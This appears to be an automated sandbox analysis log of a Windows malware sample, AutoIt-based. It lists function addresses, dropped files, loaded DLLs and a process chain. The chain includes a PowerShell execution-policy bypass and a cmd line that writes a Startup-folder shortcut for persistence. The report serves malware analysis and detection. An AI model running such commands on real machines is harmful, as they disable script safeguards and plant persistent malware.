Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978684C0 0_2_00007FF7978684C0
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797854514 0_2_00007FF797854514
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B83D4 0_2_00007FF7978B83D4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79785C3FC 0_2_00007FF79785C3FC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797872400 0_2_00007FF797872400
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C6320 0_2_00007FF7978C6320
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C8360 0_2_00007FF7978C8360
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978502C4 0_2_00007FF7978502C4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79785C130 0_2_00007FF79785C130
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978630DC 0_2_00007FF7978630DC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797840E70 0_2_00007FF797840E70
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978DCE8C 0_2_00007FF7978DCE8C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797850E90 0_2_00007FF797850E90
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797876DE4 0_2_00007FF797876DE4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797872D20 0_2_00007FF797872D20
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C6C34 0_2_00007FF7978C6C34
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978D0AEC 0_2_00007FF7978D0AEC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797832AE0 0_2_00007FF797832AE0
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0046B020 3_2_0046B020
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004694E0 3_2_004694E0
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00469C80 3_2_00469C80
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004823F5 3_2_004823F5
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004E8400 3_2_004E8400
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00496502 3_2_00496502
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0049265E 3_2_0049265E
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0046E6F0 3_2_0046E6F0
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0048282A 3_2_0048282A
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004989BF 3_2_004989BF
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00496A74 3_2_00496A74
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004E0A3A 3_2_004E0A3A
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00470BE0 3_2_00470BE0
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0048CD51 3_2_0048CD51
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004BEDB2 3_2_004BEDB2
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004C8E44 3_2_004C8E44
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004E0EB7 3_2_004E0EB7
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00496FE6 3_2_00496FE6
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004833B7 3_2_004833B7
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0047D45D 3_2_0047D45D
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0048F409 3_2_0048F409
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00461663 3_2_00461663
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0047F628 3_2_0047F628
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0046F6A0 3_2_0046F6A0
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004816B4 3_2_004816B4
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004878C3 3_2_004878C3
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00481BA8 3_2_00481BA8
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0048DBA5 3_2_0048DBA5
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00499CE5 3_2_00499CE5
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0047DD28 3_2_0047DD28
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_00481FC0 3_2_00481FC0
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0048BFD6 3_2_0048BFD6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F2B020 8_2_00F2B020
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F294E0 8_2_00F294E0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F29C80 8_2_00F29C80
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F423F5 8_2_00F423F5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00FA8400 8_2_00FA8400
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F56502 8_2_00F56502
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F2E6F0 8_2_00F2E6F0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F5265E 8_2_00F5265E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4282A 8_2_00F4282A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F589BF 8_2_00F589BF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F56A74 8_2_00F56A74
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00FA0A3A 8_2_00FA0A3A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F30BE0 8_2_00F30BE0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F7EDB2 8_2_00F7EDB2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4CD51 8_2_00F4CD51
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00FA0EB7 8_2_00FA0EB7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F88E44 8_2_00F88E44
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F56FE6 8_2_00F56FE6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F433B7 8_2_00F433B7
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F3D45D 8_2_00F3D45D
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4F409 8_2_00F4F409
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F416B4 8_2_00F416B4
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F2F6A0 8_2_00F2F6A0
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F21663 8_2_00F21663
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F3F628 8_2_00F3F628
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F478C3 8_2_00F478C3
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4DBA5 8_2_00F4DBA5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F41BA8 8_2_00F41BA8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F59CE5 8_2_00F59CE5
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F3DD28 8_2_00F3DD28
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4BFD6 8_2_00F4BFD6
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F41FC0 8_2_00F41FC0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\Public\InformationCheck.exe 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif 237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: String function: 00F40D17 appears 70 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: String function: 00F48B30 appears 42 times
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: String function: 00F31A36 appears 34 times
Source: C:\Users\Public\InformationCheck.exe Code function: String function: 00488B30 appears 42 times
Source: C:\Users\Public\InformationCheck.exe Code function: String function: 00471A36 appears 34 times
Source: C:\Users\Public\InformationCheck.exe Code function: String function: 00480D17 appears 70 times
Source: C:\Users\user\Desktop\file.exe Code function: String function: 00007FF797858D58 appears 76 times
Sample file is different than original file name gathered from version info
Source: file.exe, 00000000.00000003.1700160371.000002B512254000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs file.exe
Source: file.exe, 00000000.00000003.1693624835.000002B51232E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAutoIt3.exeB vs file.exe
Source: classification engine Classification label: mal100.expl.evad.winEXE@12/10@3/1
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B3778 GetLastError,FormatMessageW, 0_2_00007FF7978B3778
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79789D5CC LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 0_2_00007FF79789D5CC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79789CCE0 AdjustTokenPrivileges,CloseHandle, 0_2_00007FF79789CCE0
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004B8DE9 AdjustTokenPrivileges,CloseHandle, 3_2_004B8DE9
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004B9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 3_2_004B9399
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F78DE9 AdjustTokenPrivileges,CloseHandle, 8_2_00F78DE9
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F79399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 8_2_00F79399
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B58C4 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, 0_2_00007FF7978B58C4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978ABE00 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, 0_2_00007FF7978ABE00
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978B5F2C CoInitialize,CoCreateInstance,CoUninitialize, 0_2_00007FF7978B5F2C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797836580 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, 0_2_00007FF797836580
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\InformationCheck.exe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eamjnkh2.zwk.ps1 Jump to behavior
Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: file.exe ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\InformationCheck.exe "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3
Source: C:\Users\Public\InformationCheck.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\InformationCheck.exe "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\Public\InformationCheck.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: jscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: twext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cscui.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Section loaded: dnsapi.dll Jump to behavior
